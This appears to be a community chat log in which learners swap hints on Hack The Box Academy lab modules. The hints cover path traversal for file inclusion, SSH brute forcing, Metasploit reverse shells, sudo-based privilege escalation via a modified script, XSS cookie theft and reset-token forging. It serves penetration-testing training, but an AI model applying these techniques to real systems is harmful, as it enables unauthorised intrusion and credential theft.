Admittedly, I'm stuck, on probably the exact same spot. For me, it's telling me to use cURL to "search" for the flag but I'm unsure what exactly they mean by that.

When checking the response, it says "Please use cURL"

Is there some way of searching using cURL that I'm unaware of?

Having some trouble with the Phishing challenge in the XSS module, I got the creds, but the flag I see when I log in isn't being accepted

aaand it just worked even though I did nothing

@idle cliff you want to curl http://ip:port/search.php?search=flag -H 'authorization token'

Could you finish that? I’m facing the same issue 😕

Has someone here finished the brute force login module? 😕

@carmine hill i can help 🙂

Awesome, in the last exercise, I just don’t get the webpage to load

so you're not having trouble actually bruteforcing credentials, just getting the target to load?

Yup, haha there are two assessment parts. I completed the first one (website), but now I cannot even start the second part (service login), cause I can’t get to the website

maybe try respawning the target a few times?

I did that several times, from my virtual machine and personal computer and no luck. I could notice that when I tried to load the ip:port it tries kinda authenticate to SSH, so I thought maybe the website was on port 80, or another port but no luck yet

right for Skill Assessment Service Logon, you want to hydra SSH credentials

But it says to gather info about employees, so I guess there is a website, isn’t it? Or I just need to use the info discovered in the previous part? If this is the last one, then I guess I got it

So having a slight problem with Web Requests POST section. I'm at the end, successfully completed all tasks but as I'm trying to search for the flag, I'm using a valid authentication token / cookie but as I run the curl command it's telling me I need "A valid authentication cookie is required!"

I've even respawned the target and repeated to make sure the authentication cookie matches up with current session and get the same thing

@carmine hill yes it's the employee name after you find the last flag from the previous section

A certain wizard 🙂

Oh got it then, thanks, I thought it was a whole new exercise 😅

yea that threw me off too

I need some help on web requests decoding/encoding

I know how to decode in burp and zap, I just have not been having success

@raven cairn do you mean Web Proxies?

Yes lol

try decode base 64 a few times

then i think it's ascii hex -> url decode

I had trouble with this and just used Cyberchef 🙂

yes. dm if you still need help

dont use zap

hello

how can I make money from virtual

Zap is FOSS tho 😎 .

I like burp better as well, It just seems easier to use to me. But to each their own

B U R P B O Y S

when I use firefox it keeps trying to make my ips go to https, how can I avoid that?

@vital bough you might need to specify http when entering the URL into the browser

Not sure if there is a firefox setting or anything like that

I'll try that

Can anyone help me with the Nibbler part of the 'HTB Academy - Getting Started'

Is there anyone that have done the HACKING WORDPRESS?

Where are you stuck?

Yes, where are you stuck?

Anyone able to help with Footprinting Hard Lab, I am on the last step I think and just need a pointer

I managed to finish it, but I'd like to understand why does the ending part not work for me where I have to run ./monitor.sh

I did all the steps, but every time I try to run ./monitor.sh, I get: nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh
sudo ./monitor.sh
'unknown': I need something more specific.

@tiny ledge i get that same 'unknown' error but i am still able to catch a root shell

not sure if it matters but i did the entire file path to monitor.sh

Weird! My nc didn't catch anything for some reason, I managed to solve it by recreating the folder completely and making monitor.sh run a shell for me with /bin/bash

Anyone able to help with Footprinting Hard Lab, I am on the last step I think and just need a pointer

feel free to dm me

halpppp

Try nc 167.172..52.221 32339

Could someone help me with question 2 of footprinting SMTP? I believe my command should be correct or close, but it returns no results.

without :

nc 167.172..52.221 32339

you da man, thx

I am guessing my scan parameters must be wrong

feel free to dm me

zap is for gigachads

Burp -gt zap

For 'Password Attacks' - 'Network Services' could someone give me some good username and password lists. I'm using some from SecLists and am unable to get anything.

Web attack, bypassing security filters. I have intercepted the requests and have tried every HTTP method but am still not having success. I don't know what is wrong.

@raven cairn try right clicking in burp and changing the request that way

Working on File Inclusion - Basic Bypasses and I feel like I have tried all examples in the section. I see how the current path is functioning but my commands still do not seem to be working for me. Any hints would be great

@slow ruin make sure your url includes index.php?language=languages/

hmm I have been trying all my commands in that fashion I know there is a ton of ways to path truncate does it matter which one we should be using?

using two slashes and four dots should do the trick

holy moly idk why I was adding an extra slash which was goofing it all up?! lol thanks @west canopy

Thanks. This helped me to get the flag.

ugh what im doing wrong 😭

@unreal sigil

When you run the smbclient command to connect as the Bob user, is it prompting you for a password?

backslash instead of forward slash?? windows style???

@odd shore That's probably it. Nice catch 🙂

omg lol yeah it was the slashes lmao thx

can someone help me with SEToolkit?

specifically the cred harvester

Has anyone completed 'Password Attacks' - 'Network Services'??

im on modules doing linux fundamentals under Service and Process Management, when i enable the ssh.service its says its running fine then when i reboot and do systemctl list-units --type=service it says sslh.service active: failed sub: failed. What did i do wrong

I'm doing Getting Started. Trying to connect to smbclient as the Bob user, I do not know what the password is. I tried Welcome1, was I supposed to learn how to hack passwords somewhere else?

@maiden spindle did you ever get any help with that one?

no

@burnt sky would you be able to lead me in the right direction?

is HTB good for general computer learning ie. Linux etc or just hacking

hey guys does anyone solve the 2nd question of [Information Gathering - Web Edition][Active Infrastructure Identification]?
the question is Which CMS is used on app.inlanefreight.local? (Format: word)
it is joomla but when i submit it , it gives me wrong answer

solved! you should use with !

the password is already correct. how did you try to access SMB?

Can anyone help me with the port I need to use in - Getting Started - Knowledge check, I'm trying to use Metasploit to get reverse shell to Getsimple site

Started reverse TCP handler on 46.101.2.213:4444

10.129.42.249:80 - Exploit aborted due to failure: unknown: 10.129.42.249:80 - Upload failed

Use the ones supplied in the resources section. You may have to create a mutated list though

There are other platforms for that

I think I've learned most of my Linux by doing these, so it's a good start atleast

You only have to set RHOSTS and LHOST.
RHOSTS = Your destination address
LHOST = Your VPN IP address (tun0 in your own VM) / IP address form your pwn box

Thanks I got it! Any tips how to escalate privileges after I get in as normal user, cant find similar .sh files to the earlier assignment

Run a script such as LinEnum or LinPEAS to assist with finding common local privilege escalation vectors.

Thanks, any idea how can I go from meterpreter to proper shell? meterpreter > wget 10.10.14.106:8080/LinEnum.sh
[-] Unknown command: wget

shell

Thanks! Never used this before

Hi all, I've just noticed that I now have to re-do some of the LFI module as it's been updated. I've gotten completely stumped on the "basic bypasses" page...I have tried everything mentioned in this section including the new content. Anyone got any tips?

To be more specific, I've tried bypassing simple removal of path traversal, url encoding, starting with the languages path to get around the Illegal path issue, and truncation...and mixtures of all of the above
EDIT: figured it out after several hours...my hint for others is to keep it simple and make sure you include plenty of upward file traversals to get to root!

Can someone give me a heads-up what to do with this information: [+] Possible sudo pwnage!
/usr/bin/php
It's supposed to help me escalate to root privileges, but cant seem to understand how 🙂

It's obtained from: LinEnum.sh

comparing this to the example in the instructions, we last used the same tactic, but the file was monitor.sh where we wrote it to /bin/bash, but does not seem to work here

Have you checked GTFOBins?

check https://gtfobins.github.io/ for a solution

Thanks both, I'll take a look @acoustic owl @rustic sage, got the flag! The GTFObins was a real eyeopener, haven't checked this one before, this will help so much in the future

Hi, has anyone finished the final assessment of the server side attack module? can't find where to start..

What was shown in the module does not really help you here.
Look into the source code. Also take a close look at the included files.

I'm trying to complete it, but what do you mean?

Start with the allowed path, then traverse up a bunch...I think I used ....// also. Don't need any of the truncation stuff. Don't think I needed url encoding either

Is the flag in /flag.txt?

Yep

Broken Authentication Bruteforcing Passwords
If I understand correctly, grep '[[:upper:]]' rockyou.txt | grep '[[:lower:]]' | grep -E '^.{8,12}$' is not correct and needs to be padded? since the password policy includes numbers that the grep command does not include. That is, the policy allows the word "qW1, Qw1,1qW", but this filter incorrectly selects words from the list?!

is this filter correct?
grep '[0-9]' rockyou-50.txt | grep '[[:upper:]]' | grep '[[:lower:]]' | grep -E '^.{3,12}$'

Broken Authentication Bruteforcing Usernames /question2/.
I can't figure out where to look!

I'm also stuck on Bruteforcing Passwords. But for the brute forcing question2, even if I haven't found the answer yet, look at the send post. It sends some data that you can use.

look in the intruder in burp?

yes or in the developper tools network

and how to filter a word in a burp from an outgoing request for thousands of words?

watch manually one word at a time?

In the options you can filter for a word under Grep-Match section.

Ok, everyone. I am having problems with the Web Requests Module. More specifically, I am having trouble with the GET request part of the module

Here is the question: "The exercise above seems to be broken, as it returns incorrect results. Use the browser devtools to see what is the request it is sending when we search, and use cURL to search for 'flag' and obtain the flag."

I used the browser devtools and I looked at the request tab in devtools, but there wasn't anything interesting to see there.

Did you read the Hint?
Don't forget to set the user credentials when you send the 'search' request

I authenticated in my web browser. admin:admin@Server IP:Port

ok, if you are searching for anything, what is the URL?

Do you mean the Get request?

yes

I get the http://Server Port:Port/search.php?search=Manchester

I mean: http:// server ip: port/search.php?search=Manchester

Manchester is just the term I search for.

Correct

Now look for which term you need to search and build the cURL query.
Remember that you have to log in first.

Well, I have the filename /search.php, which is the backend server that searches for the results. My search item is Manchester. This is all in the Get Request

Yes, that's all you need.

Now you only have to search for the word that was given to you in the task.

Can anyone help me with the BROKEN AUTHENTICATION module? I'm stuck on Bruteforcing Cookies. I tampered with the cookie, but the flag doesn't appear.

It's unclear! I want to manually create a list, which I will then encode in md5 and compare with the token. $token = md5($username . $time); total we know name= htbuser. and the time is known=13:31:33. $time = intval(microtime(true) * 1000); how do i turn time into $time ?

Predictable Reset Token

do you just need to multiply seconds by 1000 (33*1000) or is microtime hours+minutes+seconds?

academy.hackthebox.com is currently down for me (HTTP 502 on the host according to Cloudflare).

Same here...

Aaaand back it went.

I need some help 🙏
Module: File Inclusions-->Section: Automated Scanning

@quaint marsh DM me.

ok

I am having issues with Footprinting MYSQL, the prerequisites mentioned do not download, the nmap scan will not work, and I cannot use mysql command at all. Does anyone know what I could have wrong? I have found workarounds, not sure why what was suggested does not work.

I'm trying to work through the SQL Injections module, but I can't connect to any of the docker instances which spawn. I've tried resetting at least 10 times, and connections are either refused or timeout.

Good afternoon! Can you please tell me where to go?😀
Password attacks:Finding Credentials in Linux

The best is to talk to the HTB support team. Chat bubble bottom right

Are you trying from a pwnbox or from your own VM? It takes 30-60 seconds for the instance to boot up, because it's a mysql server

Tried from both. Eventually it connected, but it took much longer than 60 seconds. Around 5 minutes actually so I guess I just needed to be a bit more patient

Will look into it to make it faster 👍🏻

hey guys, who can help me with Web Request Module?

I'm having some troubles with PUT API Method

Somebody help me about "DnsAdmins" module. I upload the dll and add the netadm user in the correct group, but I have not access to the flag file.

@tight mesa that's the final section right? I had to go through all of the steps. Rename a city to "flag", delete HTB_City and HTB_New_City, and then i was able to curl "flag" to retrieve the answer

@glad orbit I had to use a reverse shell dll in order to get the flag. I still need to try it but you might be able to right click and launch CMD as as administrator and use the netadm user and get the flag that way (after it's been moved to the administrators group)

yes it is

ok., I will doing that, ty @west canopy

Hi, I have currently finished the introduction to networking module, I was trying some stuff on my own and I am having some doubts.
Could I ask anybody?

dm if you still need help

Anyone?

Hey I have some trouble solving PHP Web Shells on the **SHELLS & PAYLOADS ** module

I cant use correct the burpsuite

anyone that can help me?

hey i am stucked at LFI module can anyone correct me?

I can try

I havent looked at the updated module and the notes I have are on the old module.

I will try to help you

guys, im losing my mind. has anyone else had mad problems with downloading crackmapexec on the htb machine

im getting so many errors with every method i try

Tried that: #modules message ?

wow

wow

just wow

thank you

Any help

@unique saddle

Thank you so much.

You're very welcome 🙂

Is it hard HTB

Or should I try Tryhack me

I stuck so many times

HTB is typically very difficult for beginners.

Can you explain me how this command work

I think THM has a lot of information but isn't as "hands on" or as challenging as HTB. Personally I have not used THM but i know it's popular.

I stick to HTB

Hello in the module Command injections and the sections Detection we must answer the question with a english phrase(the error message).
it's cool but not all of the users of HTB use a browser in english.. it's not a really important problem but i think it can be improve !

@fierce atlas maybe mention it in the #858470491676737536 room

@west canopy yep i move my message

Are we supposed to find a hash first?

(Password Attacks)

If so, I can't seem to find it.,

I keep trying the password I use to log into my HTB account but it's not working

Is it supposed to be that or something else

Check the credentials file on your desktop

desktop meaning the pwnbox?

Yea

got it, i see it
thx so much

hey, i have problem with submitting the answers in HTB academy, im now in WEB REQUESTS module in bugbounty path and i have the correct asnwer but keep returns with WROG ASNWER , what should i do in this case?

Make sure you don't have extra spaces before or after your answer. The web app isn't designed to strip them when you press submit

I can help you if you still have doubts

Anyone complete the question for this section? Need help

Send a GET request to the above server, and read the response headers to find the version of Apache running on the server? (answer format: X.Y.ZZ)-------------- this is the question as we see we have e.x also for the answer so i tried to put in different ways and looked for youtube but still gives me WRONG ANSWER

Hi, has someone finished the final assessment of Session Security? I think I managed to do what is suggested in the hint, but i can't verify because i don't know the admin mail address... Am I on the right track?

I'm stuck on the question 2 of Predictable Reset Token. Request a reset token for htbuser and find the encoding algorithm, then request a reset token for htbadmin to force a password change and forge a valid temp password to login. What is the flag?
I've found the correct algorithm but after i'm stuck.

@knotty hemlock I was able to solve it by using the exact same technique from the "Session Hijacking" section of Cross Site Scripting module.

Once you get XSS set up on julie rogers profile, you can use the API endpoint to make the admin user visit her page, which lets you steal the admin cookie.

anyone having any issue getting to their target on pwnbox? I've tried on firefox and bash, I've tried closing reopening and trying again, I've tried resetting, terminating, I even restarted my computer

what module/section is that?

web enumeration

cracking into htb

oh not me my b

@unreal sigil I think it's an issue with Docker targets, usually i have to spawn them four or five times before they actually boot up.

bug bounty path , web requests section

ok thx

its not the first time and im loosing cubes and when im done with moudle it cant be submitted as done!

@proud sparrow

i know how to get the version and for me its 2.4.29

Hmm maybe there is some variation with the Docker targets. I was having a similar issue on the LFI module and they ended up changing the question because different docker instances would give different results.

yo also for me in LFI i had issues also

thank you, got it 🥰 but i was so proud i got the csrf token... i wonder if there would have been another way using that one. anyway, thank you 😃

My Chrome browser has been having no luck accessing htb websites. What could be the reason for that? Is it because I'm using chrome and should be using firefox? Thanks everyone!!

@swift trench Are you not able to access spawned targets, or not able to get to the HTB website period?

i need help im done tried alot but there is no way i can know,,,,any one? thank you.

The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag.------------i coudnt solve this one,what to do?

@proud sparrow you might need to refresh the page a few times. But it should load a flag which you can then curl

how did you get this flag file?? explain a littile bit

@west canopy

navigate to the target in your browser, right click and inspect element, select the "Network" tab and press reload then you should see it

@west canopy i was doing right but with domain in the examples not spawn ip, thank you tho , still i dont know how to put the answer the way it should be written

It's in the format HTB{something}, you can get it by navigating to the flag in your browser or use curl

wow! thank you man for directing me 🙂

help, with a step I can't get past because I don't know how to get the flag it asks for

Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php'

I did everything, but I don't get

what module, section, question.

module: HTTP Fundamentals, section: Post and question: Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php'.

http fundamentals???? THats not a module

@covert shoal you will want to do something like this, but search for "flag" instead of "london". Your session cookie might be different so replace it with whatever your cookie is after logging in as admin:admin

Web Request im guessing since it has a section named http fundamentals

ok, thanks

when performing an nmap on target do you leave it like this "161.35.47.235:30450" or change the numbers after the ":" or what

cause I'm not getting anything when I run it

It opens the page on firefox tho so I'm not sure why my nmap isn't giving port results

it would be like: nmap 161.35.47.235 -p 30450

but usually docker targets don't usually have any other ports open so nmap typically isn't necessary, at least when it comes to Academy modules

you might need to add sudo and add the -Pn option

if you want to wait for the long scan you can do : nmap 161.35.47.235 -p- -Pn and let it scan every port.

idk it's this im trynna do

@unreal sigil you actually don't need nmap for that section. You will want to take advantage of the wordpress plugin being used by the target (you will see it when access the target in your browser)

ok thx

I'm able to access spawned points and connect through Openvpn but I cannot reach the websites for some reason

on the active subdomain enumeration lesson for info gathering, doing the nslookup AXFR search doesn't give me any TXT records, and it looks like it also doesn't give me all the subdomains, considering the IPs of the FQDNs it asks for in other questions and the number of A records don't match. gobuster enumeration also didn't give me the other subdomains. anything i'm missing?

hey guys, i so stuck at the question

Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

i have identified the exploit on msf and with searchsploit but when i try to run in msf i gett

[] Scanned 1 of 1 hosts (100% complete)
[] Auxiliary module execution completed

where is the result lacated? any ideas

have you been able to solve this? I've tried the username and password lists provided. I can't get in to any service. The module hasn't showed me anything about mutating passwords...

which module is this? i seem to remember having done this once

this is getting started - public exploits

oh yeah, so once you have the exploit you need loaded onto msf, do show options, and that should give you a set of options. find the options you need to edit and edit them accordingly, it should have the descriptions for them, see if that works

i have tried and it says its complete but i get no output

[] Scanned 1 of 1 hosts (100% complete)
[] Auxiliary module execution completed

its supposed to make a file with the output right?

yeah, so make sure you're looking at all of the options. there's one in particular that gives you exactly what you need

that's my hint, make sure to read all of the options

@west canopy nothing to do. The user netadm is added to the administrator group but either by starting cmd as an administrator or with a reverse shell it still gives me access denied to the flag.txt

OK so you're on the Password Attacks - Network Services section right? If so, you should be able to get what's required using the username and password lists provided in the Resources section at the top right of the page, using the tools shown in that section of the module material.

I've got the same story. No matter what I send, it always says: "Check your mail"

hello there, i have a problem with the Recursive Fuzzing Task from the Attacking Web Applications with FUFF module.

I went through the website with FUFF and got an HTB code but the website tells me its wrong what should I do? Or is this just a false flag?

this is no problem! in the ddt file specify the path to the file. but how to cause an error?

@leaden sail use HTB{CODE}?

I did

send me the flag in PM (I verify with my code)

Can i DM you?

Hi! how to trigger an error?

sure

I used cdata

That's definitely weird that the reverse shell didn't work. The dns service runs with SYSTEM privileges, so catching a reverse shell via starting/restopping the service should result in a SYSTEM shell.

@jovial sun Yes , it should save the contents to a file

For Password Attacks - Network Services section , the Passwords for smb, ssh, rdp aren't in the provided List, so mutations wouldn't help, best try would be rockyou,... For the Rest of the Module you should use the Provided Resources.

i tried rockyou, but wasn't sure which users to use. It wouldnt be feasable to enumerate rockyou over several users

I have finally given up the hope of getting it on my own, would someone be able to give me a good nudge on footprinting easy lab?

@severe birch try connecting to the vsftpd port (2121) just like you would connect to ordinary ftp. From there you should be able to find a file that will allow you to SSH into the target 🙂

Would this be assuming the use of the hint? Or without it?

with the hint, you won't be able to SSH in without the username

Hi all, is there anyone who can help me with Web Service & API Attacks - Skills Assessment?
I can't find the attack point.

i think it should be the login parameters. But it doesn't work.

Can someone nudge me in the right direction

The service always hangs.
Yes, there is this hint that the service hangs, but how should I test if I really use the right parameter?

@acoustic owl DM me 🙂

hey im doing the network traffic analysis module and i have a general question. if some one has time to explain. the txt goes "By issuing the -nn switches as seen below, we tell TCPDump to refrain from resolving IP addresses and port numbers to their hostnames and common port names." my question is why is it important to refrain from resolving ip's and port numbers?

I'm just throwing a guess out there but it may cut down on the time for the program to execute.

ah... probably becomes more apparent the further you get into the course.

Having some trouble with File Inclusion - Automated Scanning.
I fuzzed the web application for exposed parameters but when testing them none seem to be working. Granted I am getting a ton of exposed parameters. Could I get a nudge on this?